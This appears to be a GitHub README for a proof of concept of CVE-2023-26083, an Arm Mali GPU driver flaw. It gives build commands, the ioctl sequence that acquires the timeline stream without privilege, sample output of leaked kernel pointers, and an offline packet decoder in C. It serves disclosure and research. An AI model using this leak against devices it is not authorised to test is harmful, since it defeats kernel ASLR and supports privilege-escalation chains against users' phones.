Noverisp3/CVE-2023-26083

GitHub: Noverisp3/CVE-2023-26083

Stars: 0 | Forks: 0

# CVE-2023-26083 – Mali GPU Kernel Address Leak via Timeline Stream

This repository contains a proof-of-concept (PoC) for **CVE-2023-26083**, a vulnerability in the Arm Mali GPU Kernel Driver (kbase) that lets an unprivileged user read kernel pointers and other internal driver state through the timeline stream exposed via `/dev/mali0`.

## Vulnerability Overview

The Mali kernel driver provides a "timeline stream" (tlstream) for profiling and debugging. The stream carries object-lifecycle events whose payloads are raw kernel pointers: the addresses of `kbase_context` objects, the GPU object, the LPUs (Logical Processing Units, i.e. job slots), the MMU address-space slots, atoms, and so on. Access to the stream is supposed to be restricted to contexts created with the `BASE_CONTEXT_CREATE_FLAG_MONITOR` flag. Because the `KBASE_IOCTL_TLSTREAM_ACQUIRE` handler did not check that permission, any process that can open `/dev/mali0` (on Android that is every app and shell user, since every graphics client needs the node) can obtain a timeline file descriptor and read the events.

**Impact:**

- Leaking kernel pointers defeats kernel ASLR (KASLR) and reveals the addresses of live driver objects.
- Combined with a memory-corruption bug (use-after-free, arbitrary write), this is the information-leak half of a privilege-escalation chain. Google TAG reported CVE-2023-26083 being used in exactly that role in an in-the-wild exploit chain against Samsung devices, and the CVE is listed in CISA's Known Exploited Vulnerabilities catalogue.
- The stream also exposes non-pointer metadata. `KBASE_TL_NEW_CTX` events carry the `tgid` of every process that holds a GPU context, so an ordinary app can enumerate other GPU-using processes, and `KBASE_TL_NEW_GPU` carries the GPU ID and core count, which is useful for fingerprinting.

## Affected Versions

Arm's advisory (see the NVD entry in the references) lists the affected kbase releases by driver family: Midgard r6p0 to r32p0, Bifrost r0p0 to r42p0, Valhall r19p0 to r42p0 and Avalon r41p0 to r42p0. The first release after each range carries the fix. The Mali-T830 in the test device below is a Midgard GPU.

## Build & Run

### Prerequisites

- A device with a Mali GPU running Arm's proprietary kbase driver (Exynos, MediaTek and some Rockchip SoCs). `/dev/mali0` must exist, whether the driver is built in or loaded as a module. Boards that run the mainline Panfrost/Panthor driver expose `/dev/dri/renderD*` instead and are not targets of this PoC.
- Root access is **not** required; the PoC runs as an unprivileged user.

### Compilation

The PoC is a single self-contained C file, so it builds with standard tools.

#### 1. For Android (recommended)

Use the Android NDK toolchain to build for ARM64. Link statically so the binary does not depend on the dynamic linker of a particular Android version:

```sh
aarch64-linux-android21-clang -static -o mali_tlstream_leak mali_tlstream_leak.c
```

Push the binary to `/data/local/tmp` with `adb push` and run it from `adb shell`.

#### 2. For ARM-based Linux boards

On an ARM board that ships a Mali GPU with the kbase driver (for example an Odroid or a Rockchip board running its vendor kernel), compile natively:

```sh
gcc -static -o mali_tlstream_leak mali_tlstream_leak.c
```

### Execution

```sh
./mali_tlstream_leak
```

The program:

1. Opens `/dev/mali0`.
2. Negotiates the ioctl interface version (`KBASE_IOCTL_VERSION_CHECK`).
3. Creates the context with `BASE_CONTEXT_CREATE_FLAG_NONE`, i.e. without monitor privilege.
4. Acquires the timeline stream with the vulnerable ioctl.
5. Reads timeline packets for a few seconds.
6. Parses the packets and prints the kernel pointers it finds, marked `*** KERNEL`.

## Example Output

**Note:** This PoC was tested only on a Samsung Galaxy J7 Prime (`on7xelte`) running Android 8.1.0 (kernel 3.18) with the 1 April 2020 security patch level.

```text
on7xelte:/data/local/tmp $ ./mali_tlstream_leak
Version: major=11 minor=5
SET_FLAGS ok
TLSTREAM_ACQUIRE ok, tlfd=4
Read 3805 bytes from tlstream (total=3805)
Raw hex dump (3805 bytes):
0000: 01 00 00 04 e1 0a 00 00 03 08 20 00 00 00 00 00
0010: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e
0020: 45 57 5f 43 54 58 00 16 00 00 00 6f 62 6a 65 63
0030: 74 20 63 74 78 20 69 73 20 63 72 65 61 74 65 64
0040: 00 05 00 00 00 40 70 49 49 00 10 00 00 00 63 74
0050: 78 2c 63 74 78 5f 6e 72 2c 74 67 69 64 00 01 00
0060: 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c 5f 4e
0070: 45 57 5f 47 50 55 00 16 00 00 00 6f 62 6a 65 63
0080: 74 20 67 70 75 20 69 73 20 63 72 65 61 74 65 64
0090: 00 05 00 00 00 40 70 49 49 00 16 00 00 00 67 70
00a0: 75 2c 67 70 75 5f 69 64 2c 63 6f 72 65 5f 63 6f
00b0: 75 6e 74 00 02 00 00 00 11 00 00 00 4b 42 41 53
00c0: 45 5f 54 4c 5f 4e 45 57 5f 4c 50 55 00 16 00 00
00d0: 00 6f 62 6a 65 63 74 20 6c 70 75 20 69 73 20 63
00e0: 72 65 61 74 65 64 00 05 00 00 00 40 70 49 49 00
00f0: 12 00 00 00 6c 70 75 2c 6c 70 75 5f 6e 72 2c 6c
0100: 70 75 5f 66 6e 00 03 00 00 00 12 00 00 00 4b 42
0110: 41 53 45 5f 54 4c 5f 4e 45 57 5f 41 54 4f 4d 00
0120: 17 00 00 00 6f 62 6a 65 63 74 20 61 74 6f 6d 20
0130: 69 73 20 63 72 65 61 74 65 64 00 04 00 00 00 40
0140: 70 49 00 0d 00 00 00 61 74 6f 6d 2c 61 74 6f 6d
0150: 5f 6e 72 00 04 00 00 00 10 00 00 00 4b 42 41 53
0160: 45 5f 54 4c 5f 4e 45 57 5f 41 53 00 20 00 00 00
0170: 61 64 64 72 65 73 73 20 73 70 61 63 65 20 6f 62
0180: 6a 65 63 74 20 69 73 20 63 72 65 61 74 65 64 00
0190: 04 00 00 00 40 70 49 00 14 00 00 00 61 64 64 72
01a0: 65 73 73 5f 73 70 61 63 65 2c 61 73 5f 6e 72 00
01b0: 05 00 00 00 11 00 00 00 4b 42 41 53 45 5f 54 4c
01c0: 5f 44 45 4c 5f 43 54 58 00 15 00 00 00 63 6f 6e
01d0: 74 65 78 74 20 69 73 20 64 65 73 74 72 6f 79 65
01e0: 64 00 03 00 00 00 40 70 00 04 00 00 00 63 74 78
01f0: 00 06 00 00 00 12 00 00 00 4b 42 41 53 45 5f 54
```

Only the first 0x200 bytes of the dump are reproduced here. The first two words (`01 00 00 04`, `e1 0a 00 00`) are the packet header: stream 1, type HEADER, class OBJ, family TL, followed by a 2785-byte payload (the next packet indeed starts at offset 8 + 2785 = 2793). The header payload opens with a short preamble (`03 08 20 00 00 00`, which reads as stream version 3, 8-byte pointers and 0x20 = 32 message descriptors) and then one descriptor per message: a u32 id, then four length-prefixed NUL-terminated strings, the name (`KBASE_TL_NEW_CTX`), the description (`object ctx is created`), the argument types (`@pII`, a pointer followed by two u32s) and the argument names (`ctx,ctx_nr,tgid`). The type strings are what a reader of the stream needs to size each event's payload.

```text
Parsing packets:
Packet at offset 0: family=TL class=OBJ type=HEADER stream=1 len=2785 numbered=0
Packet at offset 2793: family=TL class=OBJ type=SUMMARY stream=1 len=1004 numbered=0
[NEW_LPU] (ts=104596762668116, 16 bytes payload) ptr0=0xffffffc0baead7f8 *** KERNEL val1=0 val1=526
[NEW_LPU] (ts=104596762668539, 16 bytes payload) ptr0=0xffffffc0baead7fc *** KERNEL val1=1 val1=510
[NEW_LPU] (ts=104596762669039, 16 bytes payload) ptr0=0xffffffc0baead800 *** KERNEL val1=2 val1=126
[NEW_AS] (ts=104596762669654, 12 bytes payload) ptr0=0xffffffc0baeac740 *** KERNEL val1=0
[NEW_AS] (ts=104596762670078, 12 bytes payload) ptr0=0xffffffc0baeac838 *** KERNEL val1=1
[NEW_AS] (ts=104596762670347, 12 bytes payload) ptr0=0xffffffc0baeac930 *** KERNEL val1=2
[NEW_AS] (ts=104596762670539, 12 bytes payload) ptr0=0xffffffc0baeaca28 *** KERNEL val1=3
[NEW_AS] (ts=104596762670847, 12 bytes payload) ptr0=0xffffffc0baeacb20 *** KERNEL val1=4
[NEW_AS] (ts=104596762671001, 12 bytes payload) ptr0=0xffffffc0baeacc18 *** KERNEL val1=5
[NEW_AS] (ts=104596762671154, 12 bytes payload) ptr0=0xffffffc0baeacd10 *** KERNEL val1=6
[NEW_AS] (ts=104596762671462, 12 bytes payload) ptr0=0xffffffc0baeace08 *** KERNEL val1=7
[NEW_GPU] (ts=104596762671808, 16 bytes payload) ptr0=0xffffffc0baeac000 *** KERNEL val1=137363472 val1=1
[LIFELINK_LPU_GPU] (ts=104596762671962, 16 bytes payload) ptr0=0xffffffc0baead7f8 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_LPU_GPU] (ts=104596762672385, 16 bytes payload) ptr0=0xffffffc0baead7fc *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_LPU_GPU] (ts=104596762672578, 16 bytes payload) ptr0=0xffffffc0baead800 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762672924, 16 bytes payload) ptr0=0xffffffc0baeac740 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762673116, 16 bytes payload) ptr0=0xffffffc0baeac838 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762673385, 16 bytes payload) ptr0=0xffffffc0baeac930 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762673539, 16 bytes payload) ptr0=0xffffffc0baeaca28 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762673847, 16 bytes payload) ptr0=0xffffffc0baeacb20 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762674001, 16 bytes payload) ptr0=0xffffffc0baeacc18 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762674154, 16 bytes payload) ptr0=0xffffffc0baeacd10 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[LIFELINK_AS_GPU] (ts=104596762674462, 16 bytes payload) ptr0=0xffffffc0baeace08 *** KERNEL ptr1=0xffffffc0baeac000 *** KERNEL
[NEW_CTX] (ts=104596762674962, 16 bytes payload) ptr0=0xffffff802619e000 *** KERNEL val1=194 val1=12465
[NEW_CTX] (ts=104596762675654, 16 bytes payload) ptr0=0xffffff8025e13000 *** KERNEL val1=193 val1=12116
[NEW_CTX] (ts=104596762676385, 16 bytes payload) ptr0=0xffffff8025bb3000 *** KERNEL val1=192 val1=11342
[NEW_CTX] (ts=104596762677154, 16 bytes payload) ptr0=0xffffff801de1f000 *** KERNEL val1=156 val1=24216
[NEW_CTX] (ts=104596762677885, 16 bytes payload) ptr0=0xffffff801db73000 *** KERNEL val1=150 val1=29044
[NEW_CTX] (ts=104596762678616, 16 bytes payload) ptr0=0xffffff80224ce000 *** KERNEL val1=145 val1=6525
[NEW_CTX] (ts=104596762679693, 16 bytes payload) ptr0=0xffffff801f1f2000 *** KERNEL val1=47 val1=3367
[NEW_CTX] (ts=104596762680385, 16 bytes payload) ptr0=0xffffff801e187000 *** KERNEL val1=36 val1=23263
[NEW_CTX] (ts=104596762681385, 16 bytes payload) ptr0=0xffffff80243c5000 *** KERNEL val1=26 val1=15858
[NEW_CTX] (ts=104596762682193, 16 bytes payload) ptr0=0xffffff8020cff000 *** KERNEL val1=24 val1=4256
[NEW_CTX] (ts=104596762682885, 16 bytes payload) ptr0=0xffffff801f221000 *** KERNEL val1=15 val1=10645
[NEW_CTX] (ts=104596762683654, 16 bytes payload) ptr0=0xffffff801dbca000 *** KERNEL val1=3 val1=2976
[NEW_CTX] (ts=104596762684501, 16 bytes payload) ptr0=0xffffff802b375000 *** KERNEL val1=2 val1=3409
[NEW_CTX] (ts=104596762685039, 16 bytes payload) ptr0=0xffffff8020d88000 *** KERNEL val1=0 val1=2613
```

As shown, the PoC leaks multiple kernel addresses from a single unprivileged read:

- LPU (Logical Processing Unit, i.e. job slot) objects
- Address Space (AS) objects
- the GPU object
- Context objects (`kbase_context`) for every live GPU client

A few things worth reading out of the output. The PoC labels both integer arguments `val1`; per the header strings they are the second and third arguments, so for `NEW_LPU` they are `lpu_nr` and `lpu_fn`, for `NEW_AS` the slot number `as_nr` (0 to 7), for `NEW_GPU` the `gpu_id` and `core_count` (137363472 = 0x08300010, a Mali-T830 with one core), and for `NEW_CTX` the context number and the owning process's `tgid`. The pointers fall into two arm64 regions: the GPU, LPU and AS objects are linear-map addresses (`0xffffffc0...`), with the three LPU pointers 4 bytes apart and the eight AS pointers 0xf8 bytes apart, all a fixed distance from the page-aligned GPU object, so one leak pins down both the base and the internal layout of the device structure; the context objects are vmalloc addresses (`0xffffff80...`).

## Code Explanation

The key steps are:

1. **Open `/dev/mali0`**, the standard Mali device node.
2. **`KBASE_IOCTL_VERSION_CHECK`**, which negotiates the ioctl interface version (here 11.5) and must precede any other ioctl.
3. **`KBASE_IOCTL_SET_FLAGS`** with `create_flags = BASE_CONTEXT_CREATE_FLAG_NONE` (no monitor privilege). This should block timeline access, but the missing check in the acquire handler makes the flag irrelevant.
4. **`KBASE_IOCTL_TLSTREAM_ACQUIRE`**, which returns a new file descriptor for the timeline stream despite the missing monitor flag.
5. **`read()`** on that descriptor, returning raw timeline packets.
6. **Parser**: decodes each packet's two header words, builds the message table from the HEADER packet (id, name, description, argument types, argument names), sizes each event in the BODY/SUMMARY packets from its type string, and flags pointer arguments that fall in the kernel address range.

## Mitigation / Patch

Update to a driver release that includes Arm's fix, i.e. the first release after the affected ranges listed above. The kbase driver is an out-of-tree module that Arm ships to SoC vendors; it is not part of the mainline Linux tree, so on Android the fix arrives through the device's security update rather than through a kernel stable branch. Manufacturers should integrate Arm's patched driver release. There is no user-side workaround short of restricting access to `/dev/mali0`, which would break graphics for unprivileged apps.

## Disclaimer

**This code is provided for educational and security research purposes only.** Using this exploit on systems without explicit permission may violate applicable laws. The author is not responsible for any misuse or damage caused by this software. Use it only on devices you own or have written authorization to test.

## References

- [CVE-2023-26083](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26083)
- [NIST NVD - CVE-2023-26083](https://nvd.nist.gov/vuln/detail/cve-2023-26083)
- [Arm Security Center - Mali GPU Driver Vulnerabilities](https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities)

## Author

Noveris
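## Appendix: decoding captured timeline packets offline

The decoder below is an added example written for this page; it is not the repository's `mali_tlstream_leak.c` and it touches no device. It implements the packet walk described under Code Explanation: parse the two header words, build the message table from the HEADER packet (id, name, description, argument-type string such as `@pII`, argument names), then size every event in the BODY/SUMMARY packets from that string and report pointer arguments that fall in the arm64 kernel range. The bit positions in header word 0, the 6-byte header preamble and the meaning of the `p`/`I`/`L` type letters are inferred from the hex dump and the PoC's own parse line (`family=TL class=OBJ type=HEADER stream=1 len=2785`), not from Arm documentation, so treat them as assumptions. The input is constructed in `build_sample()` from the ids and values in the README output; a real capture would be the bytes `read()` from the acquired timeline descriptor, passed to `decode_stream()` as one buffer.

```c
/* Offline decoder for the Mali kbase timeline-stream (MIPE) packets shown in this README. Added
 * example, not the repository's code; the byte layout is inferred from the hex dump and the PoC's
 * parse line above and is an assumption, not taken from Arm documentation. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Word 0 (0x04000001 -> stream 1, type HEADER, class OBJ, family TL); word 1: 24-bit payload length. */
#define PKT_STREAMID(w0) ((w0) & 0xffu)
#define PKT_TYPE(w0)     (((w0) >> 16) & 0x7u)
#define PKT_CLASS(w0)    (((w0) >> 19) & 0x7fu)
#define PKT_FAMILY(w0)   (((w0) >> 26) & 0x3fu)
#define PKT_LEN(w1)      ((w1) & 0xffffffu)
enum { TYPE_HEADER = 0, TYPE_BODY = 1, TYPE_SUMMARY = 2, CLASS_OBJ = 0, FAMILY_TL = 1, MAX_MSGS = 64 };
static struct msg_desc { char name[40]; char types[16]; } msgs[MAX_MSGS];  /* filled from the HEADER packet */
struct leak { char msg[40]; uint64_t ptr; };
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
/* arm64 kernel virtual addresses sit in the upper half (0xffff...); user pointers never do. */
static int is_kernel_ptr(uint64_t v) { return (v >> 48) == 0xffff; }

/* Header string: u32 length (including NUL) then the bytes. Returns bytes consumed, 0 on error. */
static size_t rd_str(const uint8_t *p, size_t avail, char *out, size_t outsz) {
    if (avail < 4) return 0;
    uint32_t n = rd32(p);
    if (n == 0 || n > avail - 4) return 0;
    size_t c = n < outsz ? n : outsz;                  /* truncate, never overrun out[] */
    memcpy(out, p + 4, c); out[c - 1] = '\0';
    return 4 + n;
}

/* HEADER payload: u8 stream version, u8 pointer size, u32 message count, then per message
 * u32 id + four strings: name, description, argument types ("@pII"), argument names. */
static int decode_header(const uint8_t *p, size_t len) {
    if (len < 6 || p[1] != 8) return -1;               /* only 64-bit kernels handled here */
    uint32_t count = rd32(p + 2); size_t off = 6, k; char scratch[128];
    for (uint32_t i = 0; i < count; i++) {
        if (off + 4 > len) return -1;
        uint32_t id = rd32(p + off); off += 4; if (id >= MAX_MSGS) return -1;
        char *dst[4] = { msgs[id].name, scratch, msgs[id].types, scratch };
        size_t sz[4] = { sizeof msgs[id].name, sizeof scratch, sizeof msgs[id].types, sizeof scratch };
        for (int j = 0; j < 4; j++) { if (!(k = rd_str(p + off, len - off, dst[j], sz[j]))) return -1; off += k; }
    }
    return 0;
}

/* BODY/SUMMARY payload: repeated (u32 msg id, u64 timestamp, args); args are sized from the type
 * string (p = pointer, 8 bytes; I = u32; L = u64) and pointers in the kernel range are recorded. */
static int decode_events(const uint8_t *p, size_t len, struct leak *out, int max, int found) {
    for (size_t off = 0; off + 12 <= len; ) {
        uint32_t id = rd32(p + off); off += 12;        /* id + timestamp */
        if (id >= MAX_MSGS || msgs[id].types[0] != '@') return -1;   /* undescribed message: cannot size it */
        for (const char *t = msgs[id].types + 1; *t; t++) {
            size_t w = (*t == 'I') ? 4 : (*t == 'p' || *t == 'L') ? 8 : 0;
            if (w == 0 || off + w > len) return -1;
            if (*t == 'p' && is_kernel_ptr(rd64(p + off)) && found < max) {
                snprintf(out[found].msg, sizeof out[found].msg, "%s", msgs[id].name);
                out[found++].ptr = rd64(p + off);
            }
            off += w;
        }
    }
    return found;
}

/* Walk every packet in buf. Returns the number of kernel pointers written to out[], or -1 if a
 * packet is truncated or references a message the header never described. */
int decode_stream(const uint8_t *buf, size_t len, struct leak *out, int max) {
    int found = 0;
    memset(msgs, 0, sizeof msgs);
    for (size_t off = 0; off + 8 <= len; ) {
        uint32_t w0 = rd32(buf + off); size_t plen = PKT_LEN(rd32(buf + off + 4));
        if (off + 8 + plen > len) return -1;           /* declared length runs past the buffer */
        const uint8_t *p = buf + off + 8;
        if (PKT_FAMILY(w0) == FAMILY_TL && PKT_CLASS(w0) == CLASS_OBJ) {   /* AUX class has its own table; skipped */
            if (PKT_TYPE(w0) == TYPE_HEADER) { if (decode_header(p, plen)) return -1; }
            else if ((found = decode_events(p, plen, out, max, found)) < 0) return -1;
        }
        off += 8 + plen;
    }
    return found;
}

/* Constructed sample (not a real capture): a HEADER packet describing two messages and a SUMMARY
 * packet with two events, using the ids and values that appear in the README output above. */
struct wbuf { uint8_t b[512]; size_t n; };
static void put32(struct wbuf *s, uint32_t v) { memcpy(s->b + s->n, &v, 4); s->n += 4; }
static void put64(struct wbuf *s, uint64_t v) { memcpy(s->b + s->n, &v, 8); s->n += 8; }
static void put_str(struct wbuf *s, const char *z) { uint32_t n = (uint32_t)strlen(z) + 1; put32(s, n); memcpy(s->b + s->n, z, n); s->n += n; }
static size_t begin_pkt(struct wbuf *s, uint32_t type) {   /* stream 1, class OBJ, family TL; length patched by end_pkt */
    put32(s, 1u | (type << 16) | ((uint32_t)FAMILY_TL << 26)); put32(s, 0); return s->n - 4;
}
static void end_pkt(struct wbuf *s, size_t at) { uint32_t l = (uint32_t)(s->n - at - 4); memcpy(s->b + at, &l, 4); }

size_t build_sample(uint8_t *out, size_t outsz) {
    struct wbuf s = { {0}, 0 };
    size_t at = begin_pkt(&s, TYPE_HEADER);
    s.b[s.n++] = 3; s.b[s.n++] = 8; put32(&s, 2);      /* stream version, pointer size, message count */
    put32(&s, 2); put_str(&s, "KBASE_TL_NEW_LPU"); put_str(&s, "object lpu is created"); put_str(&s, "@pII"); put_str(&s, "lpu,lpu_nr,lpu_fn");
    put32(&s, 4); put_str(&s, "KBASE_TL_NEW_AS"); put_str(&s, "address space object is created"); put_str(&s, "@pI"); put_str(&s, "address_space,as_nr");
    end_pkt(&s, at); at = begin_pkt(&s, TYPE_SUMMARY);
    put32(&s, 2); put64(&s, 104596762668116ULL); put64(&s, 0xffffffc0baead7f8ULL); put32(&s, 0); put32(&s, 526);
    put32(&s, 4); put64(&s, 104596762669654ULL); put64(&s, 0xffffffc0baeac740ULL); put32(&s, 0);
    end_pkt(&s, at);
    if (s.n > outsz) return 0;
    memcpy(out, s.b, s.n); return s.n;
}
```

Two design points carry over to a real capture. The decoder refuses to guess: an event whose message id has no descriptor aborts rather than resynchronising, because without the type string there is no way to know how many bytes the event occupies, and a packet whose declared length exceeds the bytes read is rejected instead of being partially parsed. The kernel-range test is arm64-specific (upper-half addresses); on the 3.18 kernel in the test run the `0xffffffc0...` values are linear-map addresses and the `0xffffff80...` values vmalloc addresses, and a parser for a 32-bit device would need the pointer size from the header preamble to be 4, which this decoder deliberately does not handle.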